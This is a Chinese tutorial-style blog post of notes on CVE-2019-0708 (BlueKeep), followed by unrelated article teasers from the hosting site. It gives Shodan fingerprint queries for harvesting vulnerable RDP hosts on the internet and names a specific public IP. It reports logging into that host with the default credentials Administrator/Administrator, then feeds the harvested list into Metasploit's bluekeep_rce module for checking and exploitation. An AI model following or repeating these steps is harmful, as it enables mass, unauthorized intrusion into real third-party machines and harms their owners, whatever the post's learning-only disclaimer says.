shodan2

news/2024/11/23 5:36:17/

声明!
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页B站泷羽sec

cve-2019-0708漏洞

2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年的 WannaCry恶意软件的传播方式类似.成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。

CVE-2019-0708漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。该漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。
若要利用此漏洞,攻击者需要通过 RDP 向目标系统远程桌面服务发送经特殊设计的请求。

shodan search --limit 10 --fields ip_str,port ‘“\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00”’
十六进制字符串(类似于指纹的方式去找)
上面这串字符串就是cve-2019-0708的十六进制漏洞特征,
有漏洞不代表能利用。
用windows远程连接看看主机是否存活110.35.235.228
远程链接出现。测试弱口令Administrator&Administrator 无法连接 不过没事啊
我们可以使用metasploit去进行批量的漏洞利用,msfconsole

首先我们在kali上输入此命令

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

之后我们会得到
image.png

然后然后我们一个个用shodan host试看哪个会显示有cve-2019-0708的漏洞
image.png

之后我们用远程桌面连接这个ip
image.png

用弱口令Administrator&Administrator,登录成功
image.png

我们可以用这种方式来检查主机是否存活

使用matesploit

先把刚刚的10个ip放到文本文件上,且给他命名为0708,注意端口信息不用粘贴上去
image.png

直接执行msfconsole(图案是随机的,和我不一样不用担心)
image.png

search 0708
image.png

输入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

输入show options

set rhosts file: 0708的地址

之后check,开始检测10个ip里面哪个里面有上面那个漏洞·,带 * 号的就是利用不成功的
image.png

show options
主要注意payload的IP端口
image.png

show targets
image.png

download

查看download的帮助文档

shodan download -h

这个0708是文件名,但没有什么特殊故含义,你们随便命名也行
含义是:下载条数100条,漏洞特征是cve-2019-0708这个漏洞

shodan download 0708 --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

image.png

image.png

查看parse帮助文档

shodan parse -h

利用parse解压缩

shodan parse --fields ip_str 0708

image.png


http://www.ppmy.cn/news/1549220.html

相关文章

vue3 在哪些方便做了性能提升?

概要 Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架。vue2版本阶段已经证明了它的易用性和流行性,说明它已经足够优秀在构建前端应用领域,而vue3的推出更是将性能提升做了最大的优化,更加易用、灵活、高效&…

Notepad++--在开头快速添加行号

原文网址:Notepad--在开头快速添加行号_IT利刃出鞘的博客-CSDN博客 简介 本文介绍Notepad怎样在开头快速添加行号。 需求 原文件 想要的效果 方法 1.添加点号 Alt鼠标左键,从首行选中首列下拉,选中需要添加序号的所有行的首列&#xff…

Matplotlib | 结合numpy中argsort函数来画出特征阶梯图

代码 #构建分类随机森林分类器 clfRandomForestClassifier(n_estimators10,random_state42,max_depth4) clf.fit(x_val, y_val) #对自变量和因变量进行拟合 for feature in zip(x_feature,clf.feature_importances_):print(feature)(V1, 0.0038989752714058486) (V2, 0.002703…

CSS3 动画:前端开发的动态美

CSS3 动画:前端开发的动态美 CSS3 动画是现代网页设计中不可或缺的一部分,它为静态的网页元素添加了动态效果,提升了用户体验。本文将深入探讨CSS3动画的基础知识、高级技巧,并展示如何在实际项目中应用这些动画。 CSS3 动画基础 CSS3动画主要通过@keyframes和动画属性(…

2024 APMCM亚太数学建模C题 - 宠物行业及相关产业的发展分析和策略 完整参考论文(1)

摘要 近年来,中国宠物食品行业迅速增长,但面临复杂的国际形势和多变的市场环境,因此科学地分析和预测该行业的发展趋势至关重要。本研究通过构建多个机器学习与统计回归模型,量化分析中国宠物食品行业的关键驱动因素,预测未来宠物食品总产值和出口值。 在数据处理部分,…

UniApp在Vue3下使用setup语法糖创建和使用自定义组件

UniApp在Vue3下使用setup语法糖创建和使用自定义组件 在现代前端开发中&#xff0c;Vue 3 的 <script setup> 语法糖极大地简化了组件的编写和使用。本文将详细介绍如何在 UniApp 中使用 Vue 3 的 <script setup> 语法创建自定义组件&#xff0c;并在其他组件中使…

Cesium 加载B3DM模型

一、引入Cesium&#xff0c;可以使用该链接下载cesium 链接: https://pan.baidu.com/s/1BRQyaFCkxO2xQQT5RzFUCw?pwdkcv9 提取码: kcv9 在index.html文件中引入cesium <script type"text/javascript" src"/Cesium/Cesium.js"></script> …

如何从gitee中下载开源项目代码

平时我们从gitee中学习别人的项目时&#xff0c;可以把它下载到本地&#xff0c;那么如何下载呢&#xff0c;本篇文章为详细讲解一下&#xff1a; 假如说我们要学习下面的这个项目&#xff1a; 以若依框架为基础创建的权限管理系统&#xff0c;点进去之后点击 “克隆/下载” …